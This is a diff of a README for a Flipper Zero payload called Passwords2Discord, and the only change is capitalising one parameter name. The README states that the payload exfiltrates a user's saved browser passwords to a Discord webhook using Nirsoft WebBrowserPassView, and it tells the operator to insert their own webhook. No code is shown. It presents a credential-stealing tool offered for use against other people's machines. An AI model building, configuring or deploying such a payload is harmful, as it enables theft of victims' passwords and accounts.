Agente404/flipper/payloads/Passwords2Discord/README.md

 This payload exfills user browser password to Discord.

 You must edit the following parameters on the payload:
-* hook - your Discord hook
+* Hook - your Discord hook

 It uses [Nirsoft](https://www.nirsoft.net/utils/web_browser_password.html) WebBrowserPassView